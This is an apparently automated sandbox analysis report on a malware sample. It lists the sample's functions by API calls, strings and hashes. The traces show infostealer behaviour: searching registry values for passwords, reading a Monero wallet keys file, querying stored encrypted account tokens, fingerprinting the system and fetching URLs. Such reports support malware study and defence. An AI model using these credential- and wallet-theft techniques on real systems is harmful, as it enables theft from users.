                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 2507841554-0
                                          • Opcode ID: 301a7cdbfb44dff4f2835b4408c48413751db3a8aa2f6d03202a544a7b8087ba
                                          • Instruction ID: 854ff19ae3cdd9931557d6123b3435895837a589beb71cf4679e6414616f0f19
                                          • Opcode Fuzzy Hash: 301a7cdbfb44dff4f2835b4408c48413751db3a8aa2f6d03202a544a7b8087ba
                                          • Instruction Fuzzy Hash: 1E5170B1A00208ABDF24DF60DC49BEE77B8FB44705F109099B606BB1C0DB796A85CF95
                                          Function 00E972D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E9733A
                                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E973B1
                                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E9740D
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E97452
                                          • HeapFree.KERNEL32(00000000), ref: 00E97459
                                          • task.LIBCPMTD ref: 00E97555
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$EnumFreeOpenProcessValuetask
                                          • String ID: Password
                                          • API String ID: 775622407-3434357891
                                          • Opcode ID: 725580960b8c34a80187d9f3f1b4cc3e4b54955defa95e6da65b8fdd139fb5b4
                                          • Instruction ID: 54faf6b3a94f409eb8c0abecad1f3954f2124c2be50003f00c5452841910087a
                                          • Opcode Fuzzy Hash: 725580960b8c34a80187d9f3f1b4cc3e4b54955defa95e6da65b8fdd139fb5b4
                                          • Instruction Fuzzy Hash: 98613CB59142689BDF24DB50DC41BDAB7B8BF44304F0091E9E689B6141DBB06BC9CFA0
                                          Function 00E9BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          • lstrlen.KERNEL32(00000000), ref: 00E9BC9F
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E9BCCD
                                          • lstrlen.KERNEL32(00000000), ref: 00E9BDA5
                                          • lstrlen.KERNEL32(00000000), ref: 00E9BDB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                          • API String ID: 3073930149-1079375795
                                          • Opcode ID: 80e14844078be5fc4903064c1d33b6de74182436c16767428091516d46cc7257
                                          • Instruction ID: 551b5d1e9d6b3f9a84b34a646b2de1fa51f5fbd33a5234c440f3cec7e6a19b33
                                          • Opcode Fuzzy Hash: 80e14844078be5fc4903064c1d33b6de74182436c16767428091516d46cc7257
                                          • Instruction Fuzzy Hash: DAB154729102049BCF58EBA0DD56EEE73B8AF59300F455168F5077A091EF387A49CB62
                                          Function 00EA6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess$DefaultLangUser
                                          • String ID: *
                                          • API String ID: 1494266314-163128923
                                          • Opcode ID: 109fc0f7f7fe4b6067e18d65ce44db1ed75ef7f1a34ce09f06186a6aa73da3e5
                                          • Instruction ID: 5b56bd0dd1d1aa46786c3acf91d786b2ca5be74673a260982cf199b5dcaba66b
                                          • Opcode Fuzzy Hash: 109fc0f7f7fe4b6067e18d65ce44db1ed75ef7f1a34ce09f06186a6aa73da3e5
                                          • Instruction Fuzzy Hash: A7F08230A05209EFD3549FE0E90972C7B70FF0A707F080199FA4A97284DA7A5B41DF95
                                          Function 00E94FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E94FCA
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E94FD1
                                          • InternetOpenA.WININET(00EB0DDF,00000000,00000000,00000000,00000000), ref: 00E94FEA
                                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E95011
                                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E95041
                                          • InternetCloseHandle.WININET(?), ref: 00E950B9
                                          • InternetCloseHandle.WININET(?), ref: 00E950C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                          • String ID:
                                          • API String ID: 3066467675-0
                                          • Opcode ID: f2b0c353e6fb8ea51a780c0973961294559f29891868bde0828e2a24eaca2d6b
                                          • Instruction ID: bd64a2ae1cb6754aa29ba77713d494f4751cf398792d6f0788c53d911ef4678b
                                          • Opcode Fuzzy Hash: f2b0c353e6fb8ea51a780c0973961294559f29891868bde0828e2a24eaca2d6b
                                          • Instruction Fuzzy Hash: BA3104B5A00218EBDB20CF54DC85BDDB7B4FB48704F1081D9EA09B7280C7746A858F98
                                          Function 00EA8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00BBF518,00000000,?,00EB0E2C,00000000,?,00000000), ref: 00EA8130
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA8137
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EA8158
                                          • wsprintfA.USER32 ref: 00EA81AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                          • String ID: %d MB$@
                                          • API String ID: 2922868504-3474575989
                                          • Opcode ID: 17d9863320f4cdf9aee91e37716f07b7bde1ac72c0f9d009035c01aada58c2a7
                                          • Instruction ID: 2cd45aaed82f6e41838152725073bd4ffef36242a03486a7a128c33e7acbfa66
                                          • Opcode Fuzzy Hash: 17d9863320f4cdf9aee91e37716f07b7bde1ac72c0f9d009035c01aada58c2a7
                                          • Instruction Fuzzy Hash: A5211AB1E44218ABDB10DFD4CD4AFAFB7B8FB49B10F104619F605BB280D77969018BA5
                                          Function 00EA83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EA8426
                                          • wsprintfA.USER32 ref: 00EA8459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EA847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA8499
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          • RegQueryValueExA.ADVAPI32(00000000,00BBF488,00000000,000F003F,?,00000400), ref: 00EA84EC
                                          • lstrlen.KERNEL32(?), ref: 00EA8501
                                          • RegQueryValueExA.ADVAPI32(00000000,00BBF2D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EB0B34), ref: 00EA8599
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA8608
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA861A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 3896182533-4073750446
                                          • Opcode ID: 5f1faefa5fcf9cc9668b07dbb9c7c18360c9a12f0e4d6e9e4cf3355e1c3baee1
                                          • Instruction ID: 44883c9a3aa01af641d382c8a1f2ffa76ff4c207ce9b8654524ea6b4b267c222
                                          • Opcode Fuzzy Hash: 5f1faefa5fcf9cc9668b07dbb9c7c18360c9a12f0e4d6e9e4cf3355e1c3baee1
                                          • Instruction Fuzzy Hash: 7C21F6B1A00218EBDB24DB54DC85FE9B7B8FB48704F00C198EA49A7140DF756A85CFA4
                                          Function 00EA7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA76A4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA76AB
                                          • RegOpenKeyExA.ADVAPI32(80000002,00BAB8B0,00000000,00020119,00000000), ref: 00EA76DD
                                          • RegQueryValueExA.ADVAPI32(00000000,00BBF3C8,00000000,00000000,?,000000FF), ref: 00EA76FE
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA7708
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID: Windows 11
                                          • API String ID: 3225020163-2517555085
                                          • Opcode ID: b7c4e0e47e3a1c434636fc9ec11dee825b4b28602256dd25686bb1cdedad394f
                                          • Instruction ID: 89cda43d10748a36f1c848c6a89bca7a8810c9d894e23d4856b9bb865a197d09
                                          • Opcode Fuzzy Hash: b7c4e0e47e3a1c434636fc9ec11dee825b4b28602256dd25686bb1cdedad394f
                                          • Instruction Fuzzy Hash: 32014FB5B45204FBDB10DBE4DC4AFAAB7B8EB48701F104055FE85AB284DA79A9008B50
                                          Function 00EA7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7734
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA773B
                                          • RegOpenKeyExA.ADVAPI32(80000002,00BAB8B0,00000000,00020119,00EA76B9), ref: 00EA775B
                                          • RegQueryValueExA.ADVAPI32(00EA76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EA777A
                                          • RegCloseKey.ADVAPI32(00EA76B9), ref: 00EA7784
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID: CurrentBuildNumber
                                          • API String ID: 3225020163-1022791448
                                          • Opcode ID: a8b3d930366b63ee6b122264271c4fa33824707994978af1ceb3953dd37765f4
                                          • Instruction ID: 8d3ce476dfe937c20917265736f66b4e0d9612f5637386c6a1663b0cf376e58e
                                          • Opcode Fuzzy Hash: a8b3d930366b63ee6b122264271c4fa33824707994978af1ceb3953dd37765f4
                                          • Instruction Fuzzy Hash: 1A0144B5A40308FBD710DBE0DC4AFAEB7B8EB48701F004555FE45A7285DA7565008F50
                                          Function 00EA92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00EA3AEE,?), ref: 00EA92FC
                                          • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00EA9319
                                          • CloseHandle.KERNEL32(000000FF), ref: 00EA9327
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleSize
                                          • String ID: :$:
                                          • API String ID: 1378416451-4250114551
                                          • Opcode ID: 2c92e0b8f3fd3fae511390b49eec4499868b5ef72e5ee9ae9314d03a8b07685d
                                          • Instruction ID: 5de00d63e13cf1324f51b7ba64f014e3374d2b6dd2b71117e94b8580fb0a04ab
                                          • Opcode Fuzzy Hash: 2c92e0b8f3fd3fae511390b49eec4499868b5ef72e5ee9ae9314d03a8b07685d
                                          • Instruction Fuzzy Hash: 06F03C35F40208FBDF20DBB0DC49B9E77B9AB4C711F11C294BA51AB2C4DA75A6058B44
                                          Function 00E999C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                          • ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                          • LocalFree.KERNEL32(00E9148F), ref: 00E99A90
